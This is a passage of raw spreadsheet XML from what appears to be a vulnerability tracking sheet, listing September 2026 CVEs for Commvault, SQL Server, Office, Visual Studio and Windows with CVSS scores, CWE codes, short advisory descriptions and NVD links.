r="H209" s="5" t="n"><v>0.002</v></c><c r="I209" s="5" t="inlineStr" /><c r="J209" s="5" t="inlineStr" /><c r="K209" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L209" s="5" t="inlineStr" /><c r="M209" s="5" t="inlineStr" /><c r="N209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O209" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P209" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q209" s="5" t="inlineStr" /><c r="R209" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S209" s="5" t="inlineStr"><is><t>CommServe contained a cryptographic signature verification issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update CommServe and Web Server.</t></is></c><c r="T209" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77105</t></is></c></row><row r="210"><c r="A210" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B210" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C210" s="5" t="inlineStr"><is><t>CVE-2026-77106</t></is></c><c r="D210" s="5" t="n"><v>8.800000000000001</v></c><c r="E210" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G210" s="5" t="inlineStr" /><c r="H210" s="5" t="n"><v>0.003</v></c><c r="I210" s="5" t="inlineStr" /><c r="J210" s="5" t="inlineStr" /><c r="K210" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L210" s="5" t="inlineStr" /><c r="M210" s="5" t="inlineStr" /><c r="N210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O210" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P210" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q210" s="5" t="inlineStr" /><c r="R210" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S210" s="5" t="inlineStr"><is><t>Cvlaunchd contained a missing authorization issue affecting command execution authorization. Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t></is></c><c r="T210" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t></is></c></row><row r="211"><c r="A211" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B211" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C211" s="5" t="inlineStr"><is><t>CVE-2026-77480</t></is></c><c r="D211" s="5" t="n"><v>8.800000000000001</v></c><c r="E211" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F211" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G211" s="5" t="inlineStr" /><c r="H211" s="5" t="n"><v>0.005</v></c><c r="I211" s="5" t="inlineStr" /><c r="J211" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K211" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L211" s="5" t="inlineStr" /><c r="M211" s="5" t="inlineStr" /><c r="N211" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O211" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P211" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q211" s="5" t="inlineStr" /><c r="R211" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S211" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T211" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t></is></c></row><row r="212"><c r="A212" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B212" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C212" s="5" t="inlineStr"><is><t>CVE-2026-77481</t></is></c><c r="D212" s="5" t="n"><v>8.800000000000001</v></c><c r="E212" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F212" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G212" s="5" t="inlineStr" /><c r="H212" s="5" t="n"><v>0.006</v></c><c r="I212" s="5" t="inlineStr" /><c r="J212" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K212" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L212" s="5" t="inlineStr" /><c r="M212" s="5" t="inlineStr" /><c r="N212" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O212" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P212" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q212" s="5" t="inlineStr" /><c r="R212" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S212" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T212" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t></is></c></row><row r="213"><c r="A213" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B213" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C213" s="5" t="inlineStr"><is><t>CVE-2026-77482</t></is></c><c r="D213" s="5" t="n"><v>8.800000000000001</v></c><c r="E213" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F213" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G213" s="5" t="inlineStr" /><c r="H213" s="5" t="n"><v>0.008</v></c><c r="I213" s="5" t="inlineStr" /><c r="J213" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K213" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019</t></is></c><c r="L213" s="5" t="inlineStr" /><c r="M213" s="5" t="inlineStr" /><c r="N213" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O213" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P213" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q213" s="5" t="inlineStr" /><c r="R213" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S213" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T213" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t></is></c></row><row r="214"><c r="A214" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B214" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C214" s="5" t="inlineStr"><is><t>CVE-2026-77483</t></is></c><c r="D214" s="5" t="n"><v>8.800000000000001</v></c><c r="E214" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F214" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G214" s="5" t="inlineStr" /><c r="H214" s="5" t="n"><v>0.005</v></c><c r="I214" s="5" t="inlineStr" /><c r="J214" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K214" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L214" s="5" t="inlineStr" /><c r="M214" s="5" t="inlineStr" /><c r="N214" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O214" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P214" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q214" s="5" t="inlineStr" /><c r="R214" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S214" s="5" t="inlineStr"><is><t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T214" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t></is></c></row><row r="215"><c r="A215" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B215" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C215" s="5" t="inlineStr"><is><t>CVE-2026-77484</t></is></c><c r="D215" s="5" t="n"><v>8.800000000000001</v></c><c r="E215" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F215" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G215" s="5" t="inlineStr" /><c r="H215" s="5" t="n"><v>0.011</v></c><c r="I215" s="5" t="inlineStr" /><c r="J215" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K215" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L215" s="5" t="inlineStr" /><c r="M215" s="5" t="inlineStr" /><c r="N215" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O215" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P215" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q215" s="5" t="inlineStr" /><c r="R215" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S215" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T215" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t></is></c></row><row r="216"><c r="A216" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B216" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C216" s="5" t="inlineStr"><is><t>CVE-2026-77486</t></is></c><c r="D216" s="5" t="n"><v>8.800000000000001</v></c><c r="E216" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F216" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G216" s="5" t="inlineStr" /><c r="H216" s="5" t="n"><v>0.005</v></c><c r="I216" s="5" t="inlineStr" /><c r="J216" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K216" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019</t></is></c><c r="L216" s="5" t="inlineStr" /><c r="M216" s="5" t="inlineStr" /><c r="N216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P216" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q216" s="5" t="inlineStr" /><c r="R216" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S216" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T216" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t></is></c></row><row r="217"><c r="A217" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B217" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C217" s="5" t="inlineStr"><is><t>CVE-2026-77487</t></is></c><c r="D217" s="5" t="n"><v>8.800000000000001</v></c><c r="E217" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F217" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G217" s="5" t="inlineStr" /><c r="H217" s="5" t="n"><v>0.005</v></c><c r="I217" s="5" t="inlineStr" /><c r="J217" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K217" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L217" s="5" t="inlineStr" /><c r="M217" s="5" t="inlineStr" /><c r="N217" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P217" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q217" s="5" t="inlineStr" /><c r="R217" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S217" s="5" t="inlineStr"><is><t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T217" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t></is></c></row><row r="218"><c r="A218" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B218" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C218" s="5" t="inlineStr"><is><t>CVE-2026-77495</t></is></c><c r="D218" s="5" t="n"><v>8.800000000000001</v></c><c r="E218" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F218" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G218" s="5" t="inlineStr" /><c r="H218" s="5" t="n"><v>0.006</v></c><c r="I218" s="5" t="inlineStr" /><c r="J218" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K21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18" s="5" t="inlineStr" /><c r="M218" s="5" t="inlineStr" /><c r="N218" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P218" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q218" s="5" t="inlineStr" /><c r="R218" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S218" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T218" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t></is></c></row><row r="219"><c r="A219" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B219" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C219" s="5" t="inlineStr"><is><t>CVE-2026-77504</t></is></c><c r="D219" s="5" t="n"><v>8.800000000000001</v></c><c r="E219" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F219" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G219" s="5" t="inlineStr" /><c r="H219" s="5" t="n"><v>0.006</v></c><c r="I219" s="5" t="inlineStr" /><c r="J219" s="5" t="inlineStr" /><c r="K219" s="5" t="inlineStr" /><c r="L219" s="5" t="inlineStr" /><c r="M219" s="5" t="inlineStr" /><c r="N219" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P219" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q219" s="5" t="inlineStr" /><c r="R219" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S219" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T219" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77504</t></is></c></row><row r="220"><c r="A220" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B220" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C220" s="5" t="inlineStr"><is><t>CVE-2026-77901</t></is></c><c r="D220" s="5" t="n"><v>8.800000000000001</v></c><c r="E220" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F220" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G220" s="5" t="inlineStr" /><c r="H220" s="5" t="n"><v>0.006</v></c><c r="I220" s="5" t="inlineStr" /><c r="J220" s="5" t="inlineStr" /><c r="K220" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L220" s="5" t="inlineStr" /><c r="M220" s="5" t="inlineStr" /><c r="N220" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P220" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q220" s="5" t="inlineStr" /><c r="R220" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S220" s="5" t="inlineStr"><is><t>Null pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T220" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77901</t></is></c></row><row r="221"><c r="A221" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B221" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C221" s="5" t="inlineStr"><is><t>CVE-2026-77906</t></is></c><c r="D221" s="5" t="n"><v>8.800000000000001</v></c><c r="E221" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F221" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G221" s="5" t="inlineStr" /><c r="H221" s="5" t="n"><v>0.008</v></c><c r="I221" s="5" t="inlineStr" /><c r="J221" s="5" t="inlineStr" /><c r="K221" s="5" t="inlineStr"><is><t>microsoft:visual_studio_2026</t></is></c><c r="L221" s="5" t="inlineStr" /><c r="M221" s="5" t="inlineStr" /><c r="N221" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O221" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P221" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q221" s="5" t="inlineStr" /><c r="R221" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S221" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T221" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t></is></c></row><row r="222"><c r="A222" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B222" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C222" s="5" t="inlineStr"><is><t>CVE-2026-77907</t></is></c><c r="D222" s="5" t="n"><v>8.800000000000001</v></c><c r="E222" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F222" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G222" s="5" t="inlineStr" /><c r="H222" s="5" t="n"><v>0.005</v></c><c r="I222" s="5" t="inlineStr" /><c r="J222" s="5" t="inlineStr" /><c r="K222" s="5" t="inlineStr"><is><t>microsoft:visual_studio_2026</t></is></c><c r="L222" s="5" t="inlineStr" /><c r="M222" s="5" t="inlineStr" /><c r="N222" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P222" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q222" s="5" t="inlineStr" /><c r="R222" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S222" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T222" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77907</t></is></c></row><row r="223"><c r="A223" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B223" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C223" s="5" t="inlineStr"><is><t>CVE-2026-77908</t></is></c><c r="D223" s="5" t="n"><v>8.800000000000001</v></c><c r="E223" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F223" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G223" s="5" t="inlineStr" /><c r="H223" s="5" t="n"><v>0.007</v></c><c r="I223" s="5" t="inlineStr" /><c r="J223" s="5" t="inlineStr" /><c r="K223" s="5" t="inlineStr" /><c r="L223" s="5" t="inlineStr" /><c r="M223" s="5" t="inlineStr" /><c r="N223" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O223" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P223" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q223" s="5" t="inlineStr" /><c r="R223" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S223" s="5" t="inlineStr"><is><t>Improper control of generation of code ('code injection') in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t></is></c><c r="T223" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77908</t></is></c></row><row r="224"><c r="A224" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B224" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C224" s="5" t="inlineStr"><is><t>CVE-2026-78439</t></is></c><c r="D224" s="5" t="n"><v>8.800000000000001</v></c><c r="E224" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F224" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G224" s="5" t="inlineStr" /><c r="H224" s="5" t="n"><v>0.006</v></c><c r="I224" s="5" t="inlineStr" /><c r="J224" s="5" t="inlineStr" /><c r="K224" s="5" t="inlineStr" /><c r="L224" s="5" t="inlineStr" /><c r="M224" s="5" t="inlineStr" /><c r="N224" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P224" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q224" s="5" t="inlineStr" /><c r="R224" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S224" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T224" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78439</t></is></c></row><row r="225"><c r="A225" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B225" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C225" s="5" t="inlineStr"><is><t>CVE-2026-78442</t></is></c><c r="D225" s="5" t="n"><v>8.800000000000001</v></c><c r="E225" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F225" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G225" s="5" t="inlineStr" /><c r="H225" s="5" t="n"><v>0.006</v></c><c r="I225" s="5" t="inlineStr" /><c r="J225" s="5" t="inlineStr" /><c r="K225" s="5" t="inlineStr" /><c r="L225" s="5" t="inlineStr" /><c r="M225" s="5" t="inlineStr" /><c r="N225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O225" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P225" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q225" s="5" t="inlineStr" /><c r="R225" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S225" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows OLE DB allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T225" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78442</t></is></c></row><row r="226"><c r="A226" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B226" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C226" s="5" t="inlineStr"><is><t>CVE-2026-78456</t></is></c><c r="D226" s="5" t="n"><v>8.800000000000001</v></c><c r="E226" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F226" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G226" s="5" t="inlineStr" /><c r="H226" s="5" t="n"><v>0.008999999999999999</v></c><c r="I226" s="5" t="inlineStr" /><c r="J226" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K226" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022</t></is></c><c r="L226" s="5" t="inlineStr" /><c r="M226" s="5" t="inlineStr" /><c r="N226" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O226" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P226" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q226" s="5" t="inlineStr" /><c r="R226" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S226" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T226" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t></is></c></row><row r="227"><c r="A227" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B227" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C227" s="5" t="inlineStr"><is><t>CVE-2026-78462</t></is></c><c r="D227" s="5" t="n"><v>8.800000000000001</v></c><c r="E227" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F227" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G227" s="5" t="inlineStr" /><c r="H227" s="5" t="n"><v>0.005</v></c><c r="I227" s="5" t="inlineStr" /><c r="J227" s="5" t="inlineStr" /><c r="K227" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L227" s="5" t="inlineStr" /><c r="M227" s="5" t="inlineStr" /><c r="N227" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O227" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P227" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q227" s="5" t="inlineStr" /><c r="R227" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S227" s="5" t="inlineStr"><is><t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T227" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t></is></c></row><row r="228"><c r="A228" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B228" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C228" s="5" t="inlineStr"><is><t>CVE-2026-78463</t></is></c><c r="D228" s="5" t="n"><v>8.800000000000001</v></c><c r="E228" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F228" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G228" s="5" t="inlineStr" /><c r="H228" s="5" t="n"><v>0.008999999999999999</v></c><c r="I228" s="5" t="inlineStr" /><c r="J228" s="5" t="inlineStr" /><c r="K228" s="5" t="inlineStr" /><c r="L228" s="5" t="inlineStr" /><c r="M228" s="5" t="inlineStr" /><c r="N228" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O228" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P228" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q228" s="5" t="inlineStr" /><c r="R228" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S228" s="5" t="inlineStr"><is><t>Improper control of generation of code ('code injection') in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T228" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78463</t></is></c></row><row r="229"><c r="A229" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B229" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C229" s="5" t="inlineStr"><is><t>CVE-2026-78504</t></is></c><c r="D229" s="5" t="n"><v>8.800000000000001</v></c><c r="E229" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F229" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G229" s="5" t="inlineStr" /><c r="H229" s="5" t="n"><v>0.006</v></c><c r="I229" s="5" t="inlineStr" /><c r="J229" s="5" t="inlineStr" /><c r="K229" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L229" s="5" t="inlineStr" /><c r="M229" s="5" t="inlineStr" /><c r="N229" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O229" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P229" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q229" s="5" t="inlineStr" /><c r="R229" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S229" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T229" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78504</t></is></c></row><row r="230"><c r="A230" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B230" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C230" s="5" t="inlineStr"><is><t>CVE-2026-78505</t></is></c><c r="D230" s="5" t="n"><v>8.800000000000001</v></c><c r="E230" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F230" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G230" s="5" t="inlineStr" /><c r="H230" s="5" t="n"><v>0.008</v></c><c r="I230" s="5" t="inlineStr" /><c r="J230" s="5" t="inlineStr" /><c r="K230" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L230" s="5" t="inlineStr" /><c r="M230" s="5" t="inlineStr" /><c r="N230" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O230" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P230" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q230" s="5" t="inlineStr" /><c r="R230" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S230" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T230" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78505</t></is></c></row><row r="231"><c r="A231" s="5" 